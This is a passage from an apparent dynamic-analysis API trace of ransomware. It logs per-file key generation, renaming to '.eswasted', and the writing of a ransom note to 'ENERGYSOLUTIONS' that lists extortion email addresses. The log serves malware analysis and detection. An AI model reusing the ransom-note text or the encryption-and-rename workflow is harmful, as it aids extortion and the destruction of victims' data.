KEY:\r\n[begin_key]hFlkUKlqFQ9TVJT6EqHXBqVtc8CsqeABzo32XyA5Sy0WsBBzmLLaGPINRm/Xd4Dc\r\nXTX0LuMIodO3z0vUwbsA20eWEic6BuNc3r8v3ecSzofiCnW0wV9TNewVoNsp/3B2\r\n7LJ0KZwrVe/hGlBTj7LvxJmRuO0Ck9Wtga/AWyaoiWa1D+4nmc45iz+UNR7Bw/GL\r\n1N/NJ47+tPsV/IcOIWEp7jyQBh97LBACliv6GyuYc11DUwkWFmQLt76f337ePyAs\r\nwGSfu1rnuX7al/iDfi1T3VgUQgCS/NLOeQKtNKLiuauJjQL2dOdxoryYJn4bLapa\r\n3PA4Q1h1V3/EBuAww5MBdsYN8hi2QJdDz983wDuRxU8XKfjFEeFsmMEakg401P5b\r\nQJrRhXW+LRqc+konpCPNnd67LR6ATu0FxTeVx+/cfGftjyX9ByvCI2OqUj20wtkX\r\n3kTsi+aYHICxCj36/0fs8sSNnhA8bLcFTTTAv/DcerkfiuukiWkwOoIBboKqfz/q\r\naAz7vMUIsqwf96CIkZMUbWJ+boODE4AcVdyNHLs8SHjTGqwB654IR7Jsb84nYLkE\r\nlwhjM3LvFWdGHdehMnExdeolSDWkEj/TWNPI2O85/gNTYyUzrqHRJUEQC3/gHOPn\r\npIvWGyP6gTAw9Sg1IwmZPZz3k53tUtqOnwQj6HQl0+U=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.240] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de468 | out: hHeap=0x4a0000) returned 1 [0083.240] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.241] SetEndOfFile (hFile=0x118) returned 1 [0083.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.243] CloseHandle (hObject=0x118) returned 1 [0083.245] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0083.245] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4b78 | out: hHeap=0x4a0000) returned 1 [0083.245] _aulldvrm () returned 0x0 [0083.245] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.246] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.246] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.246] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0083.246] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x270) returned 0x4ddfd8 [0083.246] lstrcpyW (in: lpString1=0x4de03e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.246] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.246] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.246] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.246] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.247] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.248] SetEndOfFile (hFile=0x118) returned 1 [0083.248] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.248] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.248] lstrcpyW (in: lpString1=0x4de03e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.eswasted")) returned 1 [0083.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0083.332] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0083.332] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x85 [0083.332] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.332] CloseHandle (hObject=0x110) returned 1 [0083.334] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.334] CloseHandle (hObject=0xfc) returned 1 [0083.334] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0083.334] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.335] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0083.335] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.335] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.336] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.336] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.344] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de250 [0083.344] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.344] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.344] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]l3s+iay7hznBtSp4f1DwDw8iHGBCERHIFseHd+LOBuRJGtAvAMCSBlD/x4Fu3eQL\r\ndu8Kfu6hK8eMz2uMCbSE1dJ0Pv129JGe4QKn429pjH/8m4aCY+7tiNt8/HS5Zhxc\r\nE1utDa8KkRaRwtW1iY05drbpnnET/RQA2NJAwHIL1XbWeSuhuxyPXgtTtKmxnQxe\r\n9Da1Y5XzeVr/2MRZ0WqrI/m2uzEXnWoOAABNT0VzrkElHDbEK8ozzI7raTKfLvAY\r\n4sItw/1kGopI5ZsROPsquD1Vbtdh0Q1Kg5k4E4VBKl6Ch78LmsBkdzM/32+Wk390\r\nBaIFj6OS/XU2Dc3WIYbE55JL10M275+SkRsYBG2Zcfa/pITCZscYl5/n7LSKc7bq\r\n3HXfNQYq6eYI7MsO8UKy5MOpPKO77fZ5Cu1SUdEPQGtLSqJPcdLzZT3kkfzvhRVW\r\nhvt/FHS+FlmBH93OdOgzjB0lZ6XL5Tqkg4OCM2XS+XFaMBgk3H9IgKaNQR+0cDMl\r\nLtzMWZcvsD10Ea4xcIfHk6BfLlZcwEm+GkYHY5OKvxQHpKk9fGEePBQpFPiifqX8\r\nYKnC2J8eVZqa38Uc+D+8Ucue+MEqfPhYp9XiDOnvoScVIbegH/DX7JQDC/fJ0JLF\r\n+eA6URdCQTOI5GvQMj88AnLJSwc2ebuwKa8TGqgc8Q4=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.344] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de250 | out: hHeap=0x4a0000) returned 1 [0083.344] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.344] SetEndOfFile (hFile=0x118) returned 1 [0083.346] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.347] CloseHandle (hObject=0x118) returned 1 [0083.386] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0083.386] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5023c8 | out: hHeap=0x4a0000) returned 1 [0083.386] _aulldvrm () returned 0x0 [0083.386] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.387] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.387] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.387] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0083.387] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x292) returned 0x4ddfd8 [0083.387] lstrcpyW (in: lpString1=0x4de060, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.387] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.387] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.388] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.388] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.389] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.390] SetEndOfFile (hFile=0x118) returned 1 [0083.390] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.390] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.390] lstrcpyW (in: lpString1=0x4de060, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.eswasted")) returned 1 [0083.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0083.462] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0083.462] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x85 [0083.462] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.462] CloseHandle (hObject=0x110) returned 1 [0083.463] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.463] CloseHandle (hObject=0xfc) returned 1 [0083.463] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de278 [0083.463] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.464] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de2c0 | out: pbBuffer=0x4de2c0) returned 1 [0083.464] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.464] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.465] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.465] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de480 [0083.474] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de278 | out: hHeap=0x4a0000) returned 1 [0083.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0083.474] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]hqiqbZKxdY29/V/jIvKpTwjx1m72s64G4u9DUqCxhgTvMICVPl5sGMsSwgidQ8dC\r\nErbKLoQwaJreYzO9ZEZGYz1v7oDJWpxXTiGTLHf8PsmUHB23rmiPzFOhuuqjJGyD\r\n/uJIatM3vACEux8Ms49hekiI6WTeYJakPy6s9ZPXiFfTHXlZTAbz15dRBDsoDGRO\r\nsUxyLoJCyHJzJ/nPI5tlV8ONaRYEklIiqi/iCRiF9XgXVVOXcnqeuygAs9eQsldQ\r\nlfoOqNZULIa18dfNl7vg1zpYYSIQLRRWM/fCwDUV04K0PCDHT6ng3kHTXAqVEnzb\r\nyvPGv/AkENPlxKiUnXw+7rsnFT1EwJQgfXD/yMXaEOsCm2Nt6IZmbu6zohmmam0N\r\nNDMv2E0bRxhx0+ik/18Vu1Ma1EXB5pSmG+LmD0S5wpSiN4KR3GxhyECI+xaKcCir\r\nnqSKP5u00t/ueAcmU+eQBuFsORb36OmRZPAdc//kyogCfJuALZz460kMNdp8D3pc\r\nis52k6HS//szft1QAfVJVaxjY5NI6k5pXLUjNMOmexmjH9GRxbRa32ZNmEQBuZ6k\r\nDNitEXw2Ft2ccAs83rnW88mfsEFEkTXZQNEejttzCSocCOM2TS5b7R+VxG9aCAdp\r\naP1rFd6yRfIfABAk+ZS483TjtA5aY8o/+zerumV3gDl=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.474] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de480 | out: hHeap=0x4a0000) returned 1 [0083.474] WriteFile (in: hFile=0x118, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.475] SetEndOfFile (hFile=0x118) returned 1 [0083.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0083.477] CloseHandle (hObject=0x118) returned 1 [0083.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0083.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500940 | out: hHeap=0x4a0000) returned 1 [0083.477] _aulldvrm () returned 0x0 [0083.477] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.478] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.478] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.478] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0083.478] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x250) returned 0x4ddfd8 [0083.478] lstrcpyW (in: lpString1=0x4de01e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.478] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0083.478] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.479] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0083.479] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.480] WriteFile (in: hFile=0x118, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.481] SetEndOfFile (hFile=0x118) returned 1 [0083.481] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.481] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0083.481] lstrcpyW (in: lpString1=0x4de01e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.eswasted" (normalized: "c:\\users\\default\\ntuser.dat.log.eswasted")) returned 1 [0083.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.eswasted" (normalized: "c:\\users\\default\\ntuser.dat.log.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0083.482] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0083.482] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x400 [0083.482] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x400) returned 0x2d0000 [0083.482] CloseHandle (hObject=0xfc) returned 1 [0083.499] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.499] CloseHandle (hObject=0x110) returned 1 [0083.499] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de230 [0083.499] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.500] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de278 | out: pbBuffer=0x4de278) returned 1 [0083.500] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.500] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.500] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.500] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.509] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de438 [0083.509] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de230 | out: hHeap=0x4a0000) returned 1 [0083.509] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.509] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AMJ+rECg4TUSSzxaPFC8ESRYo/RyV/LYz5BuyaXw/b4apfNuFoyRKxh6dZPF0XUy\r\nZjKOITS+VwV48OkTb2PIFlWCGlHXqCx10HZmBdUkbVa77YnuQHt3vUyI/xWrb6zC\r\nNzqbZd16Mmu2LHHo2FyiG0a/qfMIDl97edBfuD8xsBMott4j8w63UIXV1WUmispW\r\nSsDMUJgCfvbWYYaB6/5vdbgiWtffUz0h5mpZi1f7PRBcEW3Vf7WhJSE9Dn9Hv8v1\r\n9UfLP0DfWBprn6RjrV/8ZSCMfoKqmTps3w2WxCyEy9e7pFgHbmSKzkxmYW+eyXsr\r\nE0SnTxaItQUTH0tbZHpYObmA3VD17zpsxAGcOkkUwx2/45hMYraUOfnldv0obah6\r\nO6XIGphoXVnGkoc6SmRXCX518fCqntIF+UqjppT4CK9wkgEiO4f7GbGdbsZIyap5\r\nW4Nlj8aygQWiLO8v8UbxdGsy8w2wCDLKWsuAvn23+51IJzECGGBn1AF3YwnjVf5K\r\niopxnLB08jzhKkFzYqCpXrRycT/q8A0SlzCvkhfdUZtn7BGpTO+OJ9/N/X2nXVz6\r\nKdwHA+xm07zYySpt8GiJln5p2ErV83zdIa4peDpO0wrM6IBBHfWYJHJLocknqikd\r\nA97Io1bKLafpNA6HJJcVphFgLLczAurPaTaAEMFko1N=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.509] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de438 | out: hHeap=0x4a0000) returned 1 [0083.509] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.509] SetEndOfFile (hFile=0x118) returned 1 [0083.511] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.511] CloseHandle (hObject=0x118) returned 1 [0083.511] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0083.511] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddf38 | out: hHeap=0x4a0000) returned 1 [0083.511] _aulldvrm () returned 0x0 [0083.511] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.512] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.512] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.512] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0083.512] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4e9fd8 [0083.512] lstrcpyW (in: lpString1=0x4ea070, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.512] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 